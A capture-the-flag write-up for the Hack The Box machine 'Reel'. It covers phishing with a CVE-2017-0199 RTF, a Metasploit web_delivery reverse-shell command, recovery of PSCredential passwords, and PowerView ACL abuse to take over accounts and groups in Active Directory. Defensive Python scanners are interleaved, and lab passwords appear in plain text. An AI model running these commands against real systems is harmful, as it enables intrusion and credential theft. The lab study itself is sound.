Writeup: Hack The Box - Machines - Reel

Description

  • Name: Reel
  • IP: 10.10.10.77
  • Author: egre55
  • Difficulty: 5.4/10

Discovery

nmap -sV -sC -Pn -p 1-65535 -T5 10.10.10.77

21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18 12:19AM <DIR> documents
| ftp-syst:
|_ SYST: Windows_NT
22/tcp open ssh OpenSSH 7.6 (protocol 2.0)
| ssh-hostkey:
| 2048 82:20:c3:bd:16:cb:a2:9c:88:87:1d:6c:15:59:ed:ed (RSA)
| 256 23:2b:b8:0a:8c:1c:f4:4d:8d:7e:5e:64:58:80:33:45 (ECDSA)
|_ 256 ac:8b:de:25:1d:b7:d8:38:38:9b:9c:16:bf:f6:3f:ed (ED25519)
25/tcp open smtp?
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, LDAPBindReq, LDAPSearchReq, LPDString, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, X11Probe:
| 220 Mail Service ready
| FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, RTSPRequest:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| Hello:
| 220 Mail Service ready
| EHLO Invalid domain address.
| Help:
| 220 Mail Service ready
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| SIPOptions:
| 220 Mail Service ready
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
| sequence of commands
|_ sequence of commands
| smtp-commands: REEL, SIZE 20480000, AUTH LOGIN PLAIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY

Pwn

First we downloaded all the files from the FTP server (anonymous login is allowed).

The readme states:

please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.

So we need to send a malicious RTF document to the machine through the SMTP service on port 25, which is the delivery channel the readme implies.

We first need a valid recipient address, and the metadata of the files from the FTP server revealed some e-mail addresses.

<cp:coreProperties xmlns:cp="http://schemas.openxmlformats.org/package/2006/metadata/core-properties" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:dcmitype="http://purl.org/dc/dcmitype/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><dc:creator>nico@megabank.com</dc:creator><cp:revision>4</cp:revision><dcterms:created xsi:type="dcterms:W3CDTF">2017-10-31T18:42:00Z</dcterms:created><dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-31T18:51:00Z</dcterms:modified></cp:coreProperties>

In the docx metadata we found the e-mail address nico@megabank.com, and also the host names LAPTO12.HTB.LOCAL and WEF.HTB.LOCAL.
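The docx metadata above is what an attacker harvests, and it is also what a defender strips before documents leave the organisation. The Python script below is an added example, not part of the original writeup: it builds a small docx-like archive in memory from constructed sample data modelled on the core.xml shown above, reads the core-properties fields that identify a person, and scans every XML part for e-mail addresses and internal host names. The .LOCAL suffix used to recognise internal hosts is an assumption of this example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by the docProps/core.xml part of an OOXML document.
NS = {
    "cp": "http://schemas.openxmlformats.org/package/2006/metadata/core-properties",
    "dc": "http://purl.org/dc/elements/1.1/",
}
EMAIL_RE = re.compile(r"[\w.+-]+@[\w-]+(?:\.[\w-]+)+")
# Assumption for this example: internal hosts are FQDNs under a .LOCAL suffix.
HOST_RE = re.compile(r"\b[\w-]+(?:\.[\w-]+)*\.(?:LOCAL|local)\b")


def build_sample_docx() -> bytes:
    """Build a minimal docx-like zip in memory (constructed sample, not a real file)."""
    core = (
        f'<cp:coreProperties xmlns:cp="{NS["cp"]}" xmlns:dc="{NS["dc"]}">'
        "<dc:creator>nico@megabank.com</dc:creator>"
        "<cp:lastModifiedBy>nico@megabank.com</cp:lastModifiedBy>"
        "</cp:coreProperties>"
    )
    document = (
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p><w:r><w:t>Converted on WEF.HTB.LOCAL from LAPTO12.HTB.LOCAL</w:t>"
        "</w:r></w:p></w:body></w:document>"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docProps/core.xml", core)
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


def extract_core_properties(docx_bytes: bytes) -> dict:
    """Return the core-properties fields that identify a person or account."""
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        root = ET.fromstring(zf.read("docProps/core.xml"))
    wanted = {"creator": "dc:creator", "lastModifiedBy": "cp:lastModifiedBy"}
    found = {}
    for key, tag in wanted.items():
        el = root.find(tag, NS)
        if el is not None and el.text:
            found[key] = el.text.strip()
    return found


def find_identifiers(docx_bytes: bytes) -> dict:
    """Scan every XML part of the archive for e-mail addresses and internal host names."""
    emails, hosts = set(), set()
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        for name in zf.namelist():
            if not name.endswith(".xml"):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            emails.update(EMAIL_RE.findall(text))
            hosts.update(HOST_RE.findall(text))
    return {"emails": sorted(emails), "hosts": sorted(hosts)}


if __name__ == "__main__":
    sample = build_sample_docx()
    print("core properties:", extract_core_properties(sample))
    print("identifiers:", find_identifiers(sample))
```

Run against a real .docx the same functions take the file's bytes; anything the scan reports is a candidate for removal (Word's "Inspect Document" or rewriting core.xml) before the file is published or e-mailed outside.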

Metasploit has a module, exploit/windows/fileformat/office_word_hta, for CVE-2017-0199 that crafts a malicious RTF file carrying a Meterpreter payload.

With alpine we then sent the document to reel@htb.local (any other address in the htb.local domain works too).

N.B. in alpine the domain has to be set to htb.local and the SMTP server to the IP 10.10.10.77.

And we got a session!!

Once inside we first looked for the user flag and some information about the user.

In the same folder we found another file, cred.xml, which contains a serialized PSCredential object:

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">HTB\Tom</S>
<SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
</Props>
</Obj>
</Objs>

This object can only be decrypted on the computer where it was created and by the user who exported it (HTB\nico), because the SecureString is protected with DPAPI under that user's key.
From a PowerShell prompt inside the Meterpreter session we can recover the password for HTB\Tom with: $credential = Import-CliXml -Path 'C:\Users\nico\Desktop\cred.xml';$credential.GetNetworkCredential().Password

Import-CliXml rebuilds the PSCredential with the password as a SecureString, and GetNetworkCredential() exposes it in clear text.

The password for the user tom is: 1ts-mag1c!!!.

Now we can SSH into the machine with these credentials.

Tom's group memberships (net user tom):

Local Group Memberships      *Print Operators
Global Group memberships *Domain Users *SharePoint_Admins
*MegaBank_Users *DR_Site
*HelpDesk_Admins *Restrictions

Using reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" we found the password stored for the user nico: 4dri@na2017!**. Yes, this is useless for our privesc process :)

In C:\Users\tom\Desktop\AD Audit we find a BloodHound folder and a note.txt:

Findings:
Surprisingly no AD attack paths from user to Domain Admin (using default shortest path query).
Maybe we should re-run Cypher query against other groups we've created.

BloodHound is a tool that reveals hidden and unintended relationships within an Active Directory environment; it requires a collection phase that reads the relevant information from AD, and this data collection can be done with PowerView (from PowerSploit), on which the PowerShell ingestor is built.

Luckily the BloodHound folder already contains the BloodHound_Old.ps1 ingestor: Import-Module ./BloodHound_Old.ps1 followed by Invoke-BloodHound produces the CSV files with all the collected information.

To download the CSV files we create a Meterpreter session with: msfconsole -x "use exploit/multi/script/web_delivery; set target PSH; set payload windows/x64/meterpreter/reverse_tcp; set srvhost 10.10.14.169; set LHOST 10.10.14.169; set LPORT 3487; run".

Now we have all the data for BloodHound (it has to be installed on your own machine together with neo4j).

From the BloodHound application we can query the database built from our CSVs to find the shortest path to Domain Admins.

From the note, however, we already know that there is no exploitable shortest path to Domain Admins, so we need to write Cypher queries for the shortest paths to other groups.

/usr/share/neo4j/bin/cypher-shell gives us a command-line query interface to the neo4j database that BloodHound populates (the Raw Query field in the BloodHound GUI works as well).

With Get-ADGroup -filter * -properties GroupCategory | ft name,SamAccountName we listed all the groups in AD:

name                                                            SamAccountName
---- --------------
WinRMRemoteWMIUsers__ WinRMRemoteWMIUsers__
Administrators Administrators
Users Users
Guests Guests
Print Operators Print Operators
Backup Operators Backup Operators
Replicator Replicator
Remote Desktop Users Remote Desktop Users
Network Configuration Operators Network Configuration Operators
Performance Monitor Users Performance Monitor Users
Performance Log Users Performance Log Users
Distributed COM Users Distributed COM Users
IIS_IUSRS IIS_IUSRS
Cryptographic Operators Cryptographic Operators
Event Log Readers Event Log Readers
Certificate Service DCOM Access Certificate Service DCOM Access
RDS Remote Access Servers RDS Remote Access Servers
RDS Endpoint Servers RDS Endpoint Servers
RDS Management Servers RDS Management Servers
Hyper-V Administrators Hyper-V Administrators
Access Control Assistance Operators Access Control Assistance Operators
Remote Management Users Remote Management Users
Domain Computers Domain Computers
Domain Controllers Domain Controllers
Schema Admins Schema Admins
Enterprise Admins Enterprise Admins
Cert Publishers Cert Publishers
Domain Admins Domain Admins
Domain Users Domain Users
Domain Guests Domain Guests
Group Policy Creator Owners Group Policy Creator Owners
RAS and IAS Servers RAS and IAS Servers
Server Operators Server Operators
Account Operators Account Operators
Pre-Windows 2000 Compatible Access Pre-Windows 2000 Compatible Access
Incoming Forest Trust Builders Incoming Forest Trust Builders
Windows Authorization Access Group Windows Authorization Access Group
Terminal Server License Servers Terminal Server License Servers
Allowed RODC Password Replication Group Allowed RODC Password Replication Group
Denied RODC Password Replication Group Denied RODC Password Replication Group
Read-only Domain Controllers Read-only Domain Controllers
Enterprise Read-only Domain Controllers Enterprise Read-only Domain Controllers
Cloneable Domain Controllers Cloneable Domain Controllers
Protected Users Protected Users
DnsAdmins DnsAdmins
DnsUpdateProxy DnsUpdateProxy
Exchange Install Domain Servers $831000-BCI3MP5FNBO5
Backup_Admins Backup_Admins
AppLocker_Test AppLocker_Test
SharePoint_Admins SharePoint_Admins
DR_Site DR_Site
SQL_Admins SQL_Admins
HelpDesk_Admins HelpDesk_Admins
Restrictions Restrictions
All_Staff All_Staff
MegaBank_Users MegaBank_Users
Finance_Users Finance_Users
HR_Team HR_Team

Cypher's syntax is not trivial, but it is well documented and full of examples: https://blog.cptjesus.com/posts/introtocypher.

The query that finds, for every User node n, the shortest path to the DOMAIN ADMINS@HTB.LOCAL group node m is: MATCH (n:User), (m:Group {name: "DOMAIN ADMINS@HTB.LOCAL"}), p=shortestPath((n)-[*1..]->(m)) RETURN p.

First we look for every group with ADMINS in its name together with its (transitive) members: MATCH (n:Group) WHERE n.name =~ "(?i).*ADMINS.*" WITH n MATCH (n)<-[r:MemberOf*1..]-(m) RETURN n,r,m; this query returns all the admin groups with their membership relationships.

Using the command Import-Module ActiveDirectory;cd ad:;(Get-Acl(Get-ADGroup -Filter 'name -eq "backup_admins"').DistinguishedName).access | ft identityreference, accessControlType -AutoSize we can read the ACL of the backup_admins group object, i.e. which principals hold rights over that group.

Since tom is already a member of SharePoint_Admins and HelpDesk_Admins we can skip those two groups; Backup_Admins is our target, since a backup account should be able to read all data (including root.txt inside the Administrator folder). From tom we cannot add any user to Backup_Admins, so we need to go through another user.

We found that claire is the way into Backup_Admins, and tom has WriteOwner over claire.

To escalate to claire we checked in BloodHound which rights tom holds over claire (going through all the users one by one).

Because tom has WriteOwner over claire, tom can take ownership of her account, grant himself the ResetPassword right, and reset her password.
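What the note on tom's desktop describes ("no path to Domain Admin, check the other groups") is a graph search, and the same search tells a defender which single relationship to remove to break a path. The Python below is an added example, not part of the original writeup and not BloodHound code: it holds a constructed edge list modelled on the memberships and the WriteOwner edge found in this writeup (the relationship type between claire and Backup_Admins is not stated on the page, so the example assumes WriteDacl), runs a breadth-first shortest path like BloodHound's shortestPath(), lists every *ADMINS group a principal can reach, and shows that removing tom's WriteOwner ACE on claire closes the path.

```python
from collections import deque

# Constructed edge list in the BloodHound style (source, relationship, target).
# Memberships follow the `net user` listings in this writeup and the WriteOwner
# edge is the one the writeup found; the CLAIRE -> BACKUP_ADMINS relationship
# type is NOT stated on the page and is an assumption of this example.
EDGES = [
    ("TOM@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("TOM@HTB.LOCAL", "MemberOf", "SHAREPOINT_ADMINS@HTB.LOCAL"),
    ("TOM@HTB.LOCAL", "MemberOf", "HELPDESK_ADMINS@HTB.LOCAL"),
    ("TOM@HTB.LOCAL", "WriteOwner", "CLAIRE@HTB.LOCAL"),
    ("CLAIRE@HTB.LOCAL", "MemberOf", "DOMAIN USERS@HTB.LOCAL"),
    ("CLAIRE@HTB.LOCAL", "WriteDacl", "BACKUP_ADMINS@HTB.LOCAL"),  # assumed
    ("ADMINISTRATOR@HTB.LOCAL", "MemberOf", "DOMAIN ADMINS@HTB.LOCAL"),
]


def build_adjacency(edges):
    """Map each source node to its outgoing (relationship, target) pairs."""
    adj = {}
    for src, rel, dst in edges:
        adj.setdefault(src, []).append((rel, dst))
    return adj


def shortest_path(edges, start, goal):
    """Breadth-first search over directed edges, like BloodHound's shortestPath().
    Returns the path as [(src, rel, dst), ...] or None when no path exists."""
    adj = build_adjacency(edges)
    parent = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            break
        for rel, nxt in adj.get(node, []):
            if nxt not in parent:
                parent[nxt] = (node, rel)
                queue.append(nxt)
    if goal not in parent:
        return None
    path, cur = [], goal
    while parent[cur] is not None:
        prev, rel = parent[cur]
        path.append((prev, rel, cur))
        cur = prev
    path.reverse()
    return path


def reachable_groups(edges, principal, suffix="ADMINS@HTB.LOCAL"):
    """Every group whose name ends in suffix that the principal can reach, with the
    path: the defender's version of 'check the other groups' from the note."""
    names = {dst for _, _, dst in edges} | {src for src, _, _ in edges}
    targets = sorted(n for n in names if n.endswith(suffix))
    reachable = {}
    for group in targets:
        path = shortest_path(edges, principal, group)
        if path is not None:
            reachable[group] = path
    return reachable


def shortest_path_without(edges, removed_edge, start, goal):
    """Re-run the search with one edge (e.g. an ACE about to be removed) taken out."""
    return shortest_path([e for e in edges if e != removed_edge], start, goal)


if __name__ == "__main__":
    tom, claire = "TOM@HTB.LOCAL", "CLAIRE@HTB.LOCAL"
    print("tom -> Domain Admins:", shortest_path(EDGES, tom, "DOMAIN ADMINS@HTB.LOCAL"))
    for group, path in reachable_groups(EDGES, tom).items():
        print(group, "via", " -> ".join(f"{s} [{r}] {d}" for s, r, d in path))
    cut = (tom, "WriteOwner", claire)
    print("after removing tom's WriteOwner on claire:",
          shortest_path_without(EDGES, cut, tom, "BACKUP_ADMINS@HTB.LOCAL"))
```

The direct memberships (SharePoint_Admins, HelpDesk_Admins) are what tom is supposed to have; the two-hop path through claire is the one an ACL review should catch, and removing that single WriteOwner ACE is enough to make Backup_Admins unreachable from tom in this graph.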

cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
# the same password tom already uses, as a SecureString
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force
Import-Module ./PowerView.ps1
# tom holds WriteOwner over claire: make tom the owner of her object
Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
# as owner, grant tom the right to reset claire's password
Add-ObjectACL -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
# reset the password without knowing the old one
Set-ADAccountPassword claire -NewPassword $upwd -Reset

This script uses PowerView to take ownership of claire, grant tom the ResetPassword right, and set claire's password to the same value as tom's.

Now we can SSH as claire.

But from claire's session we cannot add her to backup_admins with Add-ADGroupMember -Identity "backup_admins" -Members claire, so from tom's session we used

cd "C:\Users\tom\Desktop\AD Audit\BloodHound"
$upwd = ConvertTo-SecureString "1ts-mag1c!!!" -AsPlainText -Force
Import-Module ./PowerView.ps1
# claire's password is now the same as tom's (set in the previous step)
$cred = New-Object System.Management.Automation.PSCredential('HTB.LOCAL\Claire', $upwd)
# perform the group change with claire's explicit credentials
Add-DomainGroupMember -Identity "backup_admins" -Members 'Claire' -Credential $cred

to add claire to Backup_Admins. Now we can SSH as claire, who is a member of Backup_Admins and has read permission on the Administrator folder:

PS C:\> net user claire
User name claire
Full Name Claire Danes
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 7/24/2018 7:59:49 PM
Password expires Never
Password changeable 7/25/2018 7:59:49 PM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script
User profile
Home directory
Last logon 7/24/2018 6:42:19 PM

Logon hours allowed All

Local Group Memberships *Hyper-V Administrator
Global Group memberships *Backup_Admins *Domain Users
*MegaBank_Users *DR_Site
*Restrictions
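The two net user listings in this writeup (tom's and claire's) are exactly the output an administrator reviews when checking who sits in privileged groups. The Python below is an added example, not part of the original writeup: it parses net user output, including the indented continuation lines of the group lists, into a dictionary and then flags memberships in a set of groups that this example assumes to be privileged. One caveat it handles: net user truncates long group names to the column width, which is why the listing above shows *Hyper-V Administrator without the final s, so the check matches on the displayed prefix. The sample is a constructed copy of the claire listing above.

```python
import re

# Constructed copy of the `net user claire` listing shown above.
SAMPLE = """\
User name                    claire
Full Name                    Claire Danes
Comment
Account active               Yes
Password last set            7/24/2018 7:59:49 PM
Local Group Memberships      *Hyper-V Administrator
Global Group memberships     *Backup_Admins        *Domain Users
                             *MegaBank_Users       *DR_Site
                             *Restrictions
The command completed successfully.
"""

# Groups this example treats as privileged (an assumed list for the check).
PRIVILEGED = {
    "Administrators", "Domain Admins", "Enterprise Admins", "Backup Operators",
    "Account Operators", "Server Operators", "Print Operators", "DnsAdmins",
    "Hyper-V Administrators", "Backup_Admins", "HelpDesk_Admins", "SQL_Admins",
}

GROUP_KEYS = ("local group memberships", "global group memberships")


def _groups(fragment):
    """Split a '*A   *B' fragment into clean group names."""
    return [g.strip() for g in fragment.split("*") if g.strip()]


def parse_net_user(text):
    """Parse `net user <name>` output into a dict. Group lists are returned as
    lists under lower-cased keys, with their continuation lines merged in."""
    info, current = {}, None
    for line in text.splitlines():
        if not line.strip() or line.startswith("The command completed"):
            continue
        if line.startswith(" "):
            # indented line: continuation of the group list started above
            if current:
                info[current].extend(_groups(line))
            continue
        m = re.match(r"(.*?)\s{2,}(.*)$", line.rstrip())
        key, value = (m.group(1).strip(), m.group(2).strip()) if m else (line.strip(), "")
        if key.lower() in GROUP_KEYS:
            current = key.lower()
            info[current] = _groups(value)
        else:
            current = None
            info[key] = value
    return info


def privileged_memberships(info):
    """Return the privileged groups the account is in. net user truncates long
    group names to the column width ('Hyper-V Administrator' above stands for
    'Hyper-V Administrators'), so match on the displayed prefix."""
    shown = info.get(GROUP_KEYS[0], []) + info.get(GROUP_KEYS[1], [])
    flagged = {priv for name in shown for priv in PRIVILEGED if priv.startswith(name)}
    return sorted(flagged)


if __name__ == "__main__":
    parsed = parse_net_user(SAMPLE)
    print("account:", parsed["User name"])
    print("privileged memberships:", privileged_memberships(parsed))
```

Because the matching is prefix-based, a truncated display name can in principle match more than one real group; when that happens the right move is to confirm with Get-ADPrincipalGroupMembership rather than to trust net user alone.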

But we still cannot read the root.txt file.

In the Administrator's desktop folder we found scripts used to back up files from the system to the shared folder \\BACKUP03.

We cannot reach that share, but at the top of BackupScript.ps1 we found:

# admin password
$password="Cr4ckMeIfYouC4n!"

Using this password to SSH as administrator we can read the root flag!
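Both credential finds on this box, the PSCredential exported to cred.xml earlier and the clear-text password at the top of BackupScript.ps1, are artifacts a defender can sweep for on file servers and user profiles. The Python below is an added example, not part of the original writeup: it recognises CliXml files that serialise a System.Management.Automation.PSCredential (reporting the user name and whether the password is a DPAPI-protected SecureString, without trying to decrypt it) and PowerShell scripts that assign a string literal to a password-like variable (reporting the variable name and the length of the literal, never the value). The file set is constructed, and the pattern for secret-like variable names is an assumption of this example.

```python
import re
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCREDENTIAL = "System.Management.Automation.PSCredential"

# Assumption of this example: a string literal assigned to a variable whose name
# contains one of these words is worth reporting as a hard-coded secret.
SECRET_VAR_RE = re.compile(
    r"""^\s*\$(?P<name>\w*(?:pass|pwd|secret|token|key)\w*)\s*=\s*(?P<q>["'])(?P<value>.*?)(?P=q)""",
    re.IGNORECASE | re.MULTILINE,
)

# Constructed file set: a CliXml export shaped like the cred.xml on this box,
# a script with a password literal, and a clean script that prompts instead.
SAMPLE_FILES = {
    "C:/Users/nico/Desktop/cred.xml": f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0"><T>{PSCREDENTIAL}</T><T>System.Object</T></TN>
    <Props>
      <S N="UserName">HTB\\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb000000</SS>
    </Props>
  </Obj>
</Objs>""",
    "C:/Users/Administrator/Desktop/BackupScript.ps1":
        '# admin password\n$password="sample-not-a-real-secret"\n$dest="\\\\BACKUP03\\share"\n',
    "C:/scripts/clean.ps1": "$cred = Get-Credential\n",
}


def scan_clixml(text):
    """Report PSCredential objects serialised with Export-CliXml. The <SS> element
    is a SecureString protected with DPAPI for the exporting user on the exporting
    host, so the scanner only records that it is present."""
    findings = []
    try:
        root = ET.fromstring(text)
    except ET.ParseError:
        return findings
    for obj in root.iter(f"{{{PS_NS}}}Obj"):
        types = {t.text for t in obj.iter(f"{{{PS_NS}}}T")}
        if PSCREDENTIAL not in types:
            continue
        user = obj.find(f"{{{PS_NS}}}Props/{{{PS_NS}}}S[@N='UserName']")
        secure = obj.find(f"{{{PS_NS}}}Props/{{{PS_NS}}}SS[@N='Password']")
        findings.append({
            "kind": "clixml-pscredential",
            "user": user.text if user is not None else None,
            "dpapi_protected": secure is not None,
        })
    return findings


def scan_script(text):
    """Report string literals assigned to secret-like variables (value never stored)."""
    return [
        {"kind": "hardcoded-secret", "variable": m.group("name"),
         "value_length": len(m.group("value"))}
        for m in SECRET_VAR_RE.finditer(text)
    ]


def scan_files(files):
    """files maps path -> content; dispatch on extension and tag each finding."""
    results = []
    for path, content in files.items():
        lower = path.lower()
        if lower.endswith(".xml"):
            found = scan_clixml(content)
        elif lower.endswith((".ps1", ".psm1")):
            found = scan_script(content)
        else:
            found = []
        for finding in found:
            finding["path"] = path
            results.append(finding)
    return results


if __name__ == "__main__":
    for finding in scan_files(SAMPLE_FILES):
        print(finding)
```

A CliXml credential is only as safe as the account and host it is bound to: anyone who can run code as that user on that machine, as the phishing session did here, can call Import-CliXml on it, so such files belong in a vault, not on a desktop. The scanner deliberately records the length of a hard-coded literal rather than the literal itself, so its report can be shared without spreading the secret further.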

BloodHound resources

https://porterhau5.com/blog/representing-password-reuse-in-bloodhound/

https://porterhau5.com/blog/extending-bloodhound-track-and-visualize-your-compromise/

https://github.com/BloodHoundAD/Bloodhound/wiki

https://blog.cptjesus.com/posts/introtocypher

https://blog.stealthbits.com/attacking-active-directory-permissions-with-bloodhound/

https://wald0.com/?p=112

https://threat.tevora.com/lay-of-the-land-with-bloodhound/